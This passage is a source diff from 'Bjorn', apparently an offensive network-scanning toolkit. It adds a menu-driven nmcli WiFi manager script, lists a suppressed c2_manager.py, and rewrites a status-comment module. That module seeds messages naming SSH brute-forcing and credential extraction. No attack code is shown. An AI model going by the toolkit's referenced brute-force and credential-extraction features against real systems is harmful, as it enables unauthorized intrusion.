echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

786
bjorn_wifi.sh Normal file
View File

@@ -0,0 +1,786 @@
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -l | grep -q "^ii.*$package"; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
# Open network
log "INFO" "Creating open connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" name "$ssid"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
else
log "INFO" "Creating secured connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
fi
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated connection for '$ssid'."
else
log "ERROR" "Failed to recreate connection for '$ssid'."
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
log "INFO" "Scanning for available WiFi networks..."
nmcli device wifi rescan
sleep 2
while true; do
clear
available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
if [ -z "$available_networks" ]; then
log "WARN" "No WiFi networks found."
echo ""
else
# Remove lines with empty SSIDs (hidden networks)
network_list=$(echo "$available_networks" | grep -v '^:$')
if [ -z "$network_list" ]; then
log "WARN" "No visible WiFi networks found."
echo ""
else
echo -e "${CYAN}Available WiFi Networks:${NC}"
declare -A SSIDs
declare -A SECURITIES
index=1
while IFS=: read -r ssid security; do
# Handle hidden SSIDs
if [ -z "$ssid" ]; then
ssid="<Hidden SSID>"
fi
SSIDs["$index"]="$ssid"
SECURITIES["$index"]="$security"
printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
index=$((index + 1))
done <<< "$network_list"
fi
fi
echo ""
echo -e "${YELLOW}The list will refresh every 5 seconds. Press 'c' to connect, enter a number to connect, or 'q' to quit.${NC}"
echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
read -t 5 input
if [ $? -eq 0 ]; then
if [[ "$input" =~ ^[Qq]$ ]]; then
log "INFO" "Exiting WiFi list."
return
elif [[ "$input" =~ ^[Cc]$ ]]; then
# Handle connection via 'c'
echo ""
echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
elif [[ "$input" =~ ^[0-9]+$ ]]; then
# Handle connection via number
selection="$input"
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
else
log "ERROR" "Invalid input."
sleep 2
fi
fi
done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Remplacer SSID par NAME
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
log "INFO" "Adding new WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
log "INFO" "Adding new open WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" --ask name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
for conn in $connections; do
# Backup before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn}.nmconnection"
if nmcli connection show "$conn" &> /dev/null; then
cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection '$conn'."
fi
fi
nmcli connection delete "$conn"
log "INFO" "Deleted connection: $conn"
done
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# Liste des sauvegardes disponibles
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
if [ ${#backups[@]} -eq 0 ]; then
log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Vérifier que le fichier de sauvegarde existe
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

1351
c2_manager.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,71 +1,346 @@
# comment.py
# This module defines the `Commentaireia` class, which provides context-based random comments.
# The comments are based on various themes such as "IDLE", "SCANNER", and others, to simulate
# different states or actions within a network scanning and security context. The class uses a
# shared data object to determine delays between comments and switches themes based on the current
# state. The `get_commentaire` method returns a random comment from the specified theme, ensuring
# comments are not repeated too frequently.
# Comments manager with database backend
# Provides contextual messages for display with timing control and multilingual support.
# comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
# Avec un texte DB du style: "Trying {user}@{ip} over SSH..."
import random
import time
import logging
import json
from init_shared import shared_data
from logger import Logger
import os
import time
import random
import locale
from typing import Optional, List, Dict, Any
logger = Logger(name="comment.py", level=logging.DEBUG)
from init_shared import shared_data
from logger import Logger
logger = Logger(name="comment.py", level=20) # INFO
# --- Helpers -----------------------------------------------------------------
class _SafeDict(dict):
"""Safe formatter: leaves unknown {placeholders} intact instead of raising."""
def __missing__(self, key):
return "{" + key + "}"
def _row_get(row: Any, key: str, default=None):
"""Safe accessor for rows that may be dict-like or sqlite3.Row."""
try:
return row.get(key, default)
except Exception:
try:
return row[key]
except Exception:
return default
# --- Main class --------------------------------------------------------------
class CommentAI:
"""
AI-style comment generator for status messages with:
- Randomized delay between messages
- Database-backed phrases (text, status, theme, lang, weight)
- Multilingual search with language priority and fallbacks
- Safe string templates: "Trying {user}@{ip}..."
"""
class Commentaireia:
"""Provides context-based random comments for bjorn."""
def __init__(self):
self.shared_data = shared_data
self.last_comment_time = 0 # Initialize last_comment_time
self.comment_delay = random.randint(self.shared_data.comment_delaymin, self.shared_data.comment_delaymax) # Initialize comment_delay
self.last_theme = None # Initialize last_theme
self.themes = self.load_comments(self.shared_data.commentsfile) # Load themes from JSON file
def load_comments(self, commentsfile):
"""Load comments from a JSON file."""
cache_file = commentsfile + '.cache'
# Timing configuration with robust defaults
self.delay_min = max(1, int(getattr(self.shared_data, "comment_delaymin", 5)))
self.delay_max = max(self.delay_min, int(getattr(self.shared_data, "comment_delaymax", 15)))
self.comment_delay = self._new_delay()
# Check if a cached version exists and is newer than the original file
if os.path.exists(cache_file) and os.path.getmtime(cache_file) >= os.path.getmtime(commentsfile):
try:
with open(cache_file, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from cache.")
return comments_data
except (FileNotFoundError, json.JSONDecodeError):
logger.warning("Cache file is corrupted or not found. Loading from the original file.")
# State tracking
self.last_comment_time: float = 0.0
self.last_status: Optional[str] = None
# Load from the original file if cache is not used or corrupted
# Ensure comments are loaded in database
self._ensure_comments_loaded()
# Initialize first comment for UI using language priority
if not hasattr(self.shared_data, "bjorn_says") or not getattr(self.shared_data, "bjorn_says"):
first = self._pick_text("IDLE", lang=None, params=None)
self.shared_data.bjorn_says = first or "Initializing..."
# --- Language priority & JSON discovery ----------------------------------
def _lang_priority(self, preferred: Optional[str] = None) -> List[str]:
"""
Build ordered language preference list, deduplicated.
Priority sources:
1. explicit `preferred`
2. shared_data.lang_priority (list)
3. shared_data.lang (single fallback)
4. defaults ["en", "fr"]
"""
order: List[str] = []
def norm(x: Optional[str]) -> Optional[str]:
if not x:
return None
x = str(x).strip().lower()
return x[:2] if x else None
# 1) explicit override
p = norm(preferred)
if p:
order.append(p)
sd = self.shared_data
# 2) list from shared_data
if hasattr(sd, "lang_priority") and isinstance(sd.lang_priority, (list, tuple)):
order += [l for l in (norm(x) for x in sd.lang_priority) if l]
# 3) single language from shared_data
if hasattr(sd, "lang"):
l = norm(sd.lang)
if l:
order.append(l)
# 4) fallback defaults
order += ["en", "fr"]
# Deduplicate while preserving order
seen, res = set(), []
for l in order:
if l and l not in seen:
seen.add(l)
res.append(l)
return res
def _get_comments_json_paths(self, lang: Optional[str] = None) -> List[str]:
"""
Return candidate JSON paths, restricted to default_comments_dir (and explicit comments_file).
Supported patterns:
- {comments_file} (explicit)
- {default_comments_dir}/comments.json
- {default_comments_dir}/comments.<lang>.json
- {default_comments_dir}/{lang}/comments.json
"""
lang = (lang or "").strip().lower()
candidates = []
# 1) Explicit path from shared_data
comments_file = getattr(self.shared_data, "comments_file", "") or ""
if comments_file:
candidates.append(comments_file)
# 2) Default comments directory
default_dir = getattr(self.shared_data, "default_comments_dir", "")
if default_dir:
candidates += [
os.path.join(default_dir, "comments.json"),
os.path.join(default_dir, f"comments.{lang}.json") if lang else "",
os.path.join(default_dir, lang, "comments.json") if lang else "",
]
# Deduplicate
unique_paths, seen = [], set()
for p in candidates:
p = (p or "").strip()
if p and p not in seen:
seen.add(p)
unique_paths.append(p)
return unique_paths
# --- Bootstrapping DB -----------------------------------------------------
def _ensure_comments_loaded(self):
"""Ensure comments are present in DB; import JSON if empty."""
try:
with open(commentsfile, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from JSON file.")
# Save to cache
with open(cache_file, 'w') as cache:
json.dump(comments_data, cache)
return comments_data
except FileNotFoundError:
logger.error(f"The file '{commentsfile}' was not found.")
return {"IDLE": ["Default comment, no comments file found."]} # Fallback to a default theme
except json.JSONDecodeError:
logger.error(f"The file '{commentsfile}' is not a valid JSON file.")
return {"IDLE": ["Default comment, invalid JSON format."]} # Fallback to a default theme
comment_count = int(self.shared_data.db.count_comments())
except Exception as e:
logger.error(f"Database error counting comments: {e}")
comment_count = 0
def get_commentaire(self, theme):
""" This method returns a random comment based on the specified theme."""
current_time = time.time() # Get the current time in seconds
if theme != self.last_theme or current_time - self.last_comment_time >= self.comment_delay: # Check if the theme has changed or if the delay has expired
self.last_comment_time = current_time # Update the last comment time
self.last_theme = theme # Update the last theme
if comment_count > 0:
logger.debug(f"Comments already in database: {comment_count}")
return
if theme not in self.themes:
logger.warning(f"The theme '{theme}' is not defined, using the default theme IDLE.")
theme = "IDLE"
imported = 0
for lang in self._lang_priority():
for json_path in self._get_comments_json_paths(lang):
if os.path.exists(json_path):
try:
count = int(self.shared_data.db.import_comments_from_json(json_path))
imported += count
if count > 0:
logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
break # stop at first successful import
except Exception as e:
logger.error(f"Failed to import comments from {json_path}: {e}")
if imported > 0:
break
return random.choice(self.themes[theme]) # Return a random comment based on the specified theme
else:
if imported == 0:
logger.debug("No comments imported, seeding minimal fallback set")
self._seed_minimal_comments()
def _seed_minimal_comments(self):
"""
Seed minimal set when no JSON available.
Schema per row: (text, status, theme, lang, weight)
"""
default_comments = [
# English
("Scanning network for targets...", "NetworkScanner", "NetworkScanner", "en", 2),
("System idle, awaiting commands.", "IDLE", "IDLE", "en", 3),
("Analyzing network topology...", "NetworkScanner", "NetworkScanner", "en", 1),
("Processing authentication attempts...", "SSHBruteforce", "SSHBruteforce", "en", 2),
("Searching for vulnerabilities...", "NmapVulnScanner", "NmapVulnScanner", "en", 2),
("Extracting credentials from services...", "CredExtractor", "CredExtractor", "en", 1),
("Monitoring network changes...", "IDLE", "IDLE", "en", 2),
("Ready for deployment.", "IDLE", "IDLE", "en", 1),
("Target acquisition in progress...", "NetworkScanner", "NetworkScanner", "en", 1),
("Establishing secure connections...", "SSHBruteforce", "SSHBruteforce", "en", 1),
# French (bonus minimal)
("Analyse du réseau en cours...", "NetworkScanner", "NetworkScanner", "fr", 2),
("Système au repos, en attente dordres.", "IDLE", "IDLE", "fr", 3),
("Cartographie de la topologie réseau...", "NetworkScanner", "NetworkScanner", "fr", 1),
("Tentatives dauthentification en cours...", "SSHBruteforce", "SSHBruteforce", "fr", 2),
("Recherche de vulnérabilités...", "NmapVulnScanner", "NmapVulnScanner", "fr", 2),
("Extraction didentifiants depuis les services...", "CredExtractor", "CredExtractor", "fr", 1),
]
try:
self.shared_data.db.insert_comments(default_comments)
logger.info(f"Seeded {len(default_comments)} minimal comments into database")
except Exception as e:
logger.error(f"Failed to seed minimal comments: {e}")
# --- Core selection -------------------------------------------------------
def _new_delay(self) -> int:
"""Generate new random delay between comments."""
delay = random.randint(self.delay_min, self.delay_max)
logger.debug(f"Next comment delay: {delay}s")
return delay
def _pick_text(
self,
status: str,
lang: Optional[str],
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Pick a weighted comment across language preference; supports {templates}.
Selection cascade (per language in priority order):
1) (lang, status)
2) (lang, 'ANY')
3) (lang, 'IDLE')
Then cross-language:
4) (any, status)
5) (any, 'IDLE')
"""
status = status or "IDLE"
langs = self._lang_priority(preferred=lang)
# Language-scoped queries
rows = []
queries = [
("SELECT text, weight FROM comments WHERE lang=? AND status=?", lambda L: (L, status)),
("SELECT text, weight FROM comments WHERE lang=? AND status='ANY'", lambda L: (L,)),
("SELECT text, weight FROM comments WHERE lang=? AND status='IDLE'", lambda L: (L,)),
]
for L in langs:
for sql, args_fn in queries:
try:
rows = self.shared_data.db.query(sql, args_fn(L))
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if rows:
break
# Cross-language fallbacks
if not rows:
for sql, args in [
("SELECT text, weight FROM comments WHERE status=? ORDER BY RANDOM() LIMIT 50", (status,)),
("SELECT text, weight FROM comments WHERE status='IDLE' ORDER BY RANDOM() LIMIT 50", ()),
]:
try:
rows = self.shared_data.db.query(sql, args)
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if not rows:
return None
# Weighted selection using random.choices (no temporary list expansion)
texts: List[str] = []
weights: List[int] = []
for row in rows:
text = _row_get(row, "text", "")
if text:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
texts.append(text)
weights.append(max(1, w))
if texts:
chosen = random.choices(texts, weights=weights, k=1)[0]
else:
chosen = _row_get(rows[0], "text", None)
# Templates {var}
if chosen and params:
try:
chosen = str(chosen).format_map(_SafeDict(params))
except Exception:
# Keep the raw text if formatting fails
pass
return chosen
# --- Public API -----------------------------------------------------------
def get_comment(
self,
status: str,
lang: Optional[str] = None,
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Return a comment if status changed or delay expired.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
params: optional dict to format templates with {placeholders}.
Returns:
